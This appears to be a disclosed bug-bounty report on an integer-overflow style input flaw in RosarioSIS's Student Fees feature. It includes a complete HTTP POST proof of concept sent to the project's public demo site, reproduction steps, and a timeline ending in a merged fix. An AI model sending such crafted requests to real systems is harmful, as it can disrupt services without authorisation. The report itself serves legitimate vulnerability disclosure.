Improper handling of large integer values in francoisjacquet/rosariosis

Valid

Reported on

May 2nd 2022


Description

In create Fee function, improper handling of large integer values in mount field value.

Proof of Concept

POST /demonstration/Modules.php?modname=Student_Billing/StudentFees.php HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=kja39eaq6q73envhk6eo8300vgumn2612c5huvue08vgh66faog1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=Student_Billing/StudentFees.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 385
Origin: https://www.rosariosis.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

LO_search=&month_values[14][DUE_DATE]=&day_values[14][DUE_DATE]=&year_values[14][DUE_DATE]=&values[14][COMMENTS]=&values[new][TITLE]=ased&values[new][AMOUNT]=9999999999999999999999999&month_values[new][DUE_DATE]=&day_values[new][DUE_DATE]=&year_values[new][DUE_DATE]=&values[new][COMMENTS]=&FILE_ATTACHED=

Step to reproduce

  • Go to Student Billing
  • Create new Fee with amount 9999999999999999999999999
  • We can see server return a larger value than 9999999999999999999999999

PoC image

image

Impact

This vulnerability can make the website not work properly.

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a month ago
We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back 25 days ago
François Jacquet validated this vulnerability 24 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
François Jacquet confirmed that a fix has been merged on 386a5e 24 days ago
François Jacquet has been awarded the fix bounty
to join this conversation